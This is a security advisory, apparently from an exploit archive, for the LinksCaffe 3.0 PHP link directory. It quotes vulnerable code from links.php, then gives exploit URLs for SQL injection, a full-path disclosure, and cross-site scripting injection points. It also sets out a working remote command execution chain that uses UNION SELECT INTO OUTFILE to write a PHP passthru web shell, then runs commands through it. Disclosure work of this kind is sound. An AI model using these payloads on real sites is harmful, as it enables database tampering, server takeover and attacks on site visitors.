LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
Produce : LinksCaffe 3.0
Website : http://gonafish.com/
Impact : manupulation of data / system access
Discovered by : Simo64 - Moroccan Security Team
[+] SQL injection
******************
[1]Vulnerable code in line 223 in links.php
code :
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());
$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks
Exploit :
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
[2] Vulnerable code in line 516 in links.php
code :
if (!$newdays)
{
$newdays=$daysnew;
}
else
{
$newdays=$newdays;
}
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());
Exploit :
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
[3] Vulnerable code in line 516 in links.php
code :
if ($action=="deadlink")
{
........
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
while($row = mysql_fetch_array($rime)) {
extract($row);
echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";
echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>
<input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";
}
$link_id var are not sanitized before to be used to conducte sql injection attacks
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
[+] FullPath disclosure :
PoC :
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT
+123456/*
Result :
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554
[+] Remote Command Execution
*****************************
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+S
ELECT+0,0,0,0,'<?passthru($_GET['cmd']);?>',0,0,0,0,0,0,0,0,0,0%20INT
O%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*
after we can exec cmds
http://localhost/linkscaffe/pipo.php?cmd=ls;id
[+] Cross Site Scripting
*************************
$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks
$newdays var in links.php is not sanitized before to be used to conducte xss attacks
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks
PoC :
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+
http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]
http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]
Contact : simo64 (at) gmail (dot) com [email concealed]
greetz to all friends !
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum